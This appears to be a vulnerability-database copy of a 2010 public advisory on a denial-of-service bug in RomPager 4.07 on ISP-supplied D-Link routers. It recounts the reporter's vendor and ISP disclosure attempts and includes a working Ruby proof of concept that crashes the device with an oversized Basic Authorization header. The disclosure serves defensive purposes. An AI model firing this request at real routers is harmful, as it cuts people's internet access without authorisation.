Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RomPager 4.07 Denial Of Service

🗓️ 08 Dec 2010 00:00:00Reported by Ricky-Lee BirtlesType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

RomPager 4.07 Denial Of Service vulnerability on residential router

Code
`Software: "RomPager/4.07 UPnP/1.0"  
  
Issue: A reboot can be caused when a special crafted http request is sent.  
  
Other Details: This version of RomPager is seen on a number of  
residential routers that are shipped by a number of different ISP's.  
The router I personal know it effects is the d-link DSL-2640R shipped  
by virgin media. I also do believe this effects the d-link DSL-2641R.  
  
I have made www.allegrosoft.com aware of the issue ( the creators of  
RomPager ) and they have stated that version is very old and out dated  
and should no longer be used and they stated they have been un able to  
replicate the issue. This would lead me to believe it has something to  
do with the ISP's customer firmware, I have contacted virgin media to  
make them aware of the issue ( this was over a month ago ) so I am now  
making this public.  
  
If other people have a home router running the RomPager 4.07 software  
please try the ruby script provided bellow and see if your router  
restarts as well then add the make and module of router along with the  
location this was obtained.  
  
This is a assumption however I do think this could be further  
exploited by close investigation with jtag access to the device,  
however at the moment I am guessing the routers software watch dog  
kicks in and restarts the router  
  
Ruby Script:  
  
require 'net/https'  
  
url = URI.parse("http://IP/")  
data = nil  
headers = {  
"Host" => "IP",  
"Authorization" => "Basic  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
}  
res = Net::HTTP.start(url.host, url.port) do |http|  
http.use_ssl = false  
http.send_request("GET", url.path, data, headers)  
end  
  
puts res.body  
  
Regards,  
-- Mr R Birtles  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Dec 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
rompagerdenial of serviceresidential routersupnp/1.0http requestisp'sd-link dsl-2640rd-link dsl-2641rwww.allegrosoft.comcustomer firmwareruby scriptnet/httpsjtag accesswatch dog
31